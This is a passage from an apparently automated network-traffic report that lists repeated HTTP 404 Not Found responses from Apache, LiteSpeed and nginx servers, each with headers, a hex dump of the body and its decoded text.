74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Date: Fri, 22 Nov 2024 13:45:29 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 796
  date: Fri, 22 Nov 2024 13:46:06 GMT
  server: LiteSpeed
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 796
  date: Fri, 22 Nov 2024 13:46:09 GMT
  server: LiteSpeed
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 796
  date: Fri, 22 Nov 2024 13:46:11 GMT
  server: LiteSpeed
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Connection: close
  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
  pragma: no-cache
  content-type: text/html
  content-length: 796
  date: Fri, 22 Nov 2024 13:46:14 GMT
  server: LiteSpeed
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 22 Nov 2024 13:46:37 GMT
  Content-Type: text/html
  Content-Length: 138
  Connection: close
  ETag: "669137aa-8a"
  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 22 Nov 2024 13:46:40 GMT
  Content-Type: text/html
  Content-Length: 138
  Connection: close
  ETag: "669137aa-8a"
  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 22 Nov 2024 13:46:43 GMT
  Content-Type: text/html
  Content-Length: 138
  Connection: close
  ETag: "669137aa-8a"
  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: global traffic
HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx
  Date: Fri, 22 Nov 2024 13:46:45 GMT
  Content-Type: text/html
  Content-Length: 138
  Connection: close
  ETag: "669137aa-8a"
  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:46:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 13:47:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 